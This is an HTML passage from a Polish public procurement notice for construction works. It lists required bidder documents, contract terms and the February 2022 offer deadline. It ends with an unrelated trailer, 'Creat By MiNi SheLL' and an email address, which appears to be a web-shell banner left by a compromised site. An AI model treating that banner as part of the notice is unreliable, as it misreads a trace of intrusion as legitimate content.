class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – załącznik nr 3 do SWZ;<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w zakresie braku podstaw wykluczenia, o których mowa w art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>c) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie<br/>spłat tych należności;<br/>d) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych<br/>podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat<br/>tych należności;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale IX ust. 2 pkt 1 lit b-d,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej<br/>oceniona, do złożenia podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>a) dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę określoną przez<br/>Zamawiającego (jeżeli z dokumentu potwierdzającego zawarcie umowy ubezpieczenia nie wynika fakt<br/>uiszczenia składki ubezpieczeniowej – co stanowi warunek objęcia ochroną ubezpieczeniową – do<br/>oferty należy dołączyć dokument potwierdzający opłacenie składki) w ust. 2 pkt 3 Rozdziału VII SWZ;<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (wzór dokumentu zawarty jest w<br/>Załączniku nr 4 do SWZ<br/>c) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat<br/>ich wykształcenia, kwalifikacji zawodowych, uprawnień (numer uprawnień, czy są bez ograniczeń) i<br/>doświadczenia (szczegółowo na stanowisku kierownika budowy, kierownika robót budowlanych),<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez te osoby<br/>czynności oraz informacją o podstawie dysponowania tymi osobami – (wzór dokumentu zawarty jest w<br/>Załączniku nr 5 do SWZ .</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy –<br/>wzór oświadczenia stanowi Załącznik Nr 6 do SWZ.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty na zasadach określonych w art. 454-455 Pzp oraz wskazanych we wzorze Umowy,<br/>stanowiącym Załącznik nr 8 do SWZ.<br/>2) Zmiana umowy wymaga pod rygorem nieważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com